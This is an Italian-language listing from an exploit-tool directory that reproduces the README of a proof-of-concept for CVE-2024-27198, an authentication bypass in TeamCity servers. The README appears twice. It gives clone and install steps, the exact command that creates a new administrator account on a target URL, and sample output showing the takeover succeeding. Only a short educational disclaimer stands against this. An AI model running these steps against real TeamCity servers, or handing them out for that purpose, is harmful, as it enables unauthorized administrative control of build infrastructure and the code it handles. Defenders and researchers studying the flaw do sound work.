Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-27198 — è uno strumento PoC che sfrutta una vulnerabilità nel server TeamCity (CVE-2024-27198) | Kitploit
Strumenti/GitHubGitHub/geniuszly/cve-2024-27198
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

è uno strumento PoC che sfrutta una vulnerabilità nel server TeamCity (CVE-2024-27198)

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

EN

GenTeamCityExploit è uno strumento PoC che prende di mira una vulnerabilità nel server TeamCity (CVE-2024-27198). Consente di individuare la versione di TeamCity e di creare un nuovo utente amministratore sfruttando una falla di bypass dell'autenticazione.

Caratteristiche

  • Estrae la versione del server TeamCity.
  • Verifica la presenza di una vulnerabilità nota (CVE-2024-27198).
  • Crea un nuovo utente amministratore se il server è vulnerabile.

Prerequisiti

  • Python 3.6+: assicurati di avere Python installato.
  • Librerie: installa le librerie richieste usando:
    root@kitploit:~
    pip install requests urllib3
    

Utilizzo

  1. Clona il repository.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Spostati nella directory.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Esegui lo script con i parametri richiesti.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Parametri:
    • -t, --target: l'URL del server TeamCity di destinazione.
    • -u, --username: il nome utente per il nuovo utente amministratore.
    • -p, --password: la password per il nuovo utente amministratore.

Esempio

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Esempio di output

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

Nel caso in cui il server non sia vulnerabile o la versione non venga trovata:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

Se si verifica un errore di connessione al server:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e non deve essere utilizzato su alcun sistema senza l'esplicita autorizzazione del proprietario. L'accesso non autorizzato a sistemi informatici è illegale.

RU

GenTeamCityExploit è uno strumento PoC che prende di mira una vulnerabilità del server TeamCity (CVE-2024-27198). Permette di rilevare la versione di TeamCity e di creare un nuovo amministratore sfruttando una vulnerabilità di bypass dell'autenticazione.

Caratteristiche

  • Estrae la versione del server TeamCity.
  • Verifica la presenza di una vulnerabilità nota (CVE-2024-27198).
  • Crea un nuovo utente amministratore se il server è vulnerabile.

Prerequisiti

  • Python 3.6+: assicurati di avere Python installato.
  • Librerie: installa le librerie necessarie con il comando:
    root@kitploit:~
    pip install requests urllib3
    

Utilizzo

  1. Clona il repository.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Spostati nella cartella del progetto.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Esegui lo script con i parametri obbligatori.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Parametri:
    • -t, --target: l'URL del server TeamCity di destinazione.
    • -u, --username: il nome utente per il nuovo amministratore.
    • -p, --password: la password per il nuovo amministratore.

Esempio

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Esempio di output

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

Nel caso in cui il server non sia vulnerabile o la versione non venga trovata:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

In caso di errore di connessione al server:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e non deve essere utilizzato su alcun sistema senza l'esplicita autorizzazione del proprietario. L'accesso non autorizzato a sistemi informatici è illegale.

Scarica lo strumento